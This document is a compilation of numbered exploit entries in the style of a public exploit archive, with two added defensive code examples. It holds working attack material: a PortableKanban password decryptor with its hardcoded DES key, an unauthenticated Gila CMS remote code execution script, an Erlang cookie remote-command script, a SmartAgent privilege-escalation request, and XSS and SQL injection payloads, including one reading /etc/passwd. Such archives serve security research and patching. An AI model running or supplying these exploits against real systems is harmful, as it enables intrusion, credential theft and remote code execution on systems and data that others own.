# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on.

# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials

import json
import base64
from des import *  # python3 -m pip install des
import sys

try:
    path = sys.argv[1]
except:
    exit("Supply path to PortableKanban.pk3 as argv1")

def decode(hash):
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash, initial=b"XuVUm5fR", padding=True).decode('utf-8')

with open(path) as f:
    try:
        data = json.load(f)
    except:
        # Start of file sometimes contains junk - this automatically seeks valid JSON
        broken = True
        i = 1
        while broken:
            f.seek(i, 0)
            try:
                data = json.load(f)
                broken = False
            except:
                i += 1

for user in data["Users"]:
    print("{}:{}".format(user["Name"], decode(user["EncryptedPassword"])))
20.

# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce the vulnerability:

1. Install WordPress 5.6
2. Install and activate the Custom Global Variables plugin.
3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
4. Capture the request in Burp Suite and append the JavaScript payload mentioned below:
   "><script>(1)</script><"
5. You will observe that the payload is successfully stored in the database, and when you trigger the same functionality the JavaScript payload executes successfully and we get a pop-up.
  21. # Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
      # Date: 1.12.2021
      # Exploit Author: Enesdex
      # Vendor Homepage: https://gilacms.com/
      # Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
      # Version: x < 2.0.0
      # Tested on: Windows 10

      import requests
      import time

      target_url = "http://192.168.1.101:80/Gila/"
      cmd = "calc.exe"

      url = target_url + "?c=admin"
      # The session id cookie is used unvalidated as the session file path, and the
      # User-Agent header is written into that file along with the session data
      cookies = {"GSESSIONID": "../../index.php"}
      headers = {"User-Agent": "<?php shell_exec('" + cmd + "'); include 'src\\core\\bootstrap.php'; ?>"}

      requests.get(url, headers=headers, cookies=cookies)
      time.sleep(5)
      requests.get(target_url + "index.php")
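      An added defensive example, not Gila CMS code: the traversal above works because the cookie value becomes a path component without any check, so the fix is to validate the session id before a path is built from it. The function names, the regex bounds and the session directory are assumptions for this example.

```python
import os
import re

# A session id is expected to be an opaque token; anything outside this
# allow-list (dots, slashes, NULs, encoded bytes) is rejected before a path exists.
# The 16-64 alphanumeric bound is an assumption for this example.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9]{16,64}")


def session_file_path(session_dir, session_id):
    """Return the on-disk path for session_id, or None if the id is unsafe.

    Two independent checks: an allow-list on the id's characters, and a
    containment check that the resolved path still lies inside session_dir.
    Either alone stops '../../index.php'; keeping both means a later
    relaxation of the regex does not silently reopen the traversal.
    """
    if not isinstance(session_id, str) or not SESSION_ID_RE.fullmatch(session_id):
        return None
    base = os.path.realpath(session_dir)
    candidate = os.path.realpath(os.path.join(base, session_id))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def handle_request(session_dir, cookies):
    """Hypothetical request hook: resolve the session file named by the
    GSESSIONID cookie, refusing the request rather than touching an arbitrary file."""
    sid = cookies.get("GSESSIONID", "")
    path = session_file_path(session_dir, sid)
    if path is None:
        return "400 rejected session id"
    return "200 session file " + os.path.basename(path)


if __name__ == "__main__":
    # Constructed inputs: the advisory's traversal value and a well-formed token.
    for c in ({"GSESSIONID": "../../index.php"}, {"GSESSIONID": "k8Jm2Qv9Xw4Zt7Lp1Rs6"}):
        print(c["GSESSIONID"], "->", handle_request("/srv/app/sessions", c))
```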
  22. # Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple SQL Injections
      # Exploit Author: Mesut Cetin
      # Date: 2021-01-12
      # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
      # Affected Version: 1.0
      # Vulnerable parameter: "Search" bar (POST method)
      # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

      SQL Injection is a type of injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case.

      Explanation:

      The function "person.php" takes user input through the search bar at line 45: "$_POST['search']" and uses it without any sanitization for the following SQL statement (lines 46-49):

      $sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
      $mydb->setQuery($sql);
      $cur = $mydb->executeQuery();
      $numrows = $mydb->num_rows($cur);//get the number of count

      A single quote (') in the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL syntax errors.

      Proof of Concept:

      Since the PHP code lacks sanitization of the user input, multiple SQL injection queries can be found.

      1. Boolean-based SQL injection

      POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 --

      search=' or 1=1 --

      2. Union-based SQL injection

      To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person):

      search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -

      If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands:

      @@hostname : Current Hostname
      @@tmpdir : Temp Directory
      @@datadir : Data Directory
      @@version : Version of DB
      @@basedir : Base Directory
      user() : Current User
      database() : Current Database
      version() : Version
      schema() : Current Database
      UUID() : System UUID key
      current_user() : Current User
      current_user : Current User
      system_user() : Current System user
      session_user() : Session user
      @@GLOBAL.have_symlink : Check if Symlink is enabled or disabled
      @@GLOBAL.have_ssl : Check if it has SSL or not

      3. Time-based SQL injection

      For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -

      Mitigation:

      By using prepared statements and parameterized queries, the SQL injection can be prevented.
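      The mitigation stated above, as an added example that is not part of the original advisory or of the Cemetery Mapping code: the concatenated LIKE query from person.php next to its parameterized form, both run against a constructed in-memory SQLite table named tblpeople (SQLite stands in for MySQL here, and the rows are made up). The boolean payload from the proof of concept returns every row through the first form and nothing through the second.

```python
import sqlite3

# Constructed sample rows standing in for the tblpeople table named in the advisory.
SAMPLE_ROWS = [("Alice",), ("Bob",), ("Carol",)]


def make_db():
    """In-memory SQLite stand-in for the MySQL table (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblpeople (FNAME TEXT)")
    conn.executemany("INSERT INTO tblpeople VALUES (?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, search):
    """Mirrors person.php: the search term is spliced into the statement text,
    so quotes and comment markers inside it change the query's structure."""
    sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%" + search + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def search_safe(conn, search):
    """Parameterized form: the statement shape is fixed and the driver passes the
    term as data; the wildcards are added to the value, not to the SQL text."""
    sql = "SELECT * FROM tblpeople WHERE FNAME LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, ("%" + search + "%",)))


def demo():
    """Run a normal term, the lone quote and the advisory's boolean payload
    through both forms; returns {term: (vulnerable_result, safe_result)}."""
    conn = make_db()
    results = {}
    for term in ("Ali", "'", "' or 1=1 -- "):
        try:
            vuln = search_vulnerable(conn, term)
        except sqlite3.OperationalError as err:  # the lone quote breaks the statement
            vuln = "syntax error: {}".format(err)
        results[term] = (vuln, search_safe(conn, term))
    return results


if __name__ == "__main__":
    for term, (vuln, safe) in demo().items():
        print(repr(term), "-> vulnerable:", vuln, "| parameterized:", safe)
```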
  23. # Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
      # Date: 08-01-2021
      # Exploit Author: Jaimin Gondaliya
      # Vendor Homepage: https://www.prestashop.com
      # Software Link: https://www.prestashop.com/en/download
      # Version: Prestashop CMS - 1.7.7.0
      # Tested on: Windows 10

      Parameter: id_product

      Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

      Exploit:
      http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
  24. # Exploit Title: SmartAgent 3.1.0 - Privilege Escalation
      # Date: 01-11-2021
      # Exploit Author: Orion Hridoy
      # Vendor Homepage: https://www.smartagent.io/
      # Version: Build 3.1.0
      # Tested on: Windows 10/Kali Linux

      A low-grade user like ViewOnly can create an account with SuperUser permission.

      Steps To Reproduce:
      1. Create a user with ViewOnly
      2. Visit https://demo.localhost.com/#/CampaignManager/users
      3. Now you will be able to create an account with SuperUser.

      #Python Exploit [Replace With Your Authorization Code]
      import requests

      session = requests.Session()
      rawBody = "{\"username\":\"[email protected] \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}"
      headers = {
          "Authorization": "[email protected],engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ",
          "Accept": "application/json, text/plain, */*",
          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
          "Referer": "https://demo.localhost.com/",
          "Connection": "close",
          "Accept-Language": "en-US,en;q=0.5",
          "Accept-Encoding": "gzip, deflate",
          "DNT": "1",
          "Content-Type": "application/json",
      }
      response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers)
      print("User Created With\nUser: [email protected]\nPass: Orionhridoy69")
  25. # Exploit Title: Erlang Cookie - Remote Code Execution
      # Date: 2020-05-04
      # Exploit Author: 1F98D
      # Original Author: Milton Valencia (wetw0rk)
      # Software Link: https://www.erlang.org/
      # Version: N/A
      # Tested on: Debian 9.11 (x64)
      # References:
      # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
      #
      # Erlang allows distributed Erlang instances to connect and remotely execute commands.
      # Nodes are permitted to connect to each other if they share an authentication cookie,
      # this cookie is commonly called ".erlang.cookie"
      #
      #!/usr/local/bin/python3

      import socket
      from hashlib import md5
      import struct
      import sys

      TARGET = "192.168.1.1"
      PORT = 25672
      COOKIE = "XXXXXXXXXXXXXXXXXXXX"
      CMD = "whoami"

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s.connect((TARGET, PORT))

      # Distribution handshake: send_name
      name_msg = b"\x00"
      name_msg += b"\x15"
      name_msg += b"n"
      name_msg += b"\x00\x07"
      name_msg += b"\x00\x03\x49\x9c"
      name_msg += b"AAAAAA@AAAAAAA"
      s.send(name_msg)

      s.recv(5)  # Receive "ok" message
      challenge = s.recv(1024)  # Receive "challenge" message
      challenge = struct.unpack(">I", challenge[9:13])[0]
      print("Extracted challenge: {}".format(challenge))

      # challenge_reply: digest is md5(cookie + challenge as decimal string)
      challenge_reply = b"\x00\x15"
      challenge_reply += b"r"
      challenge_reply += b"\x01\x02\x03\x04"
      challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
      s.send(challenge_reply)

      challenge_res = s.recv(1024)
      if len(challenge_res) == 0:
          print("Authentication failed, exiting")
          sys.exit(1)
      print("Authentication successful")

      # Control message and call to os:cmd/1 via the rex server, in external term format
      ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
      msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
      msg += struct.pack(">H", len(CMD))
      msg += bytes(CMD, 'ascii')
      msg += b'jw\x04user'
      payload = b'\x70' + ctrl + msg
      payload = struct.pack('!I', len(payload)) + payload
      print("Sending cmd: '{}'".format(CMD))
      s.send(payload)
      print(s.recv(1024))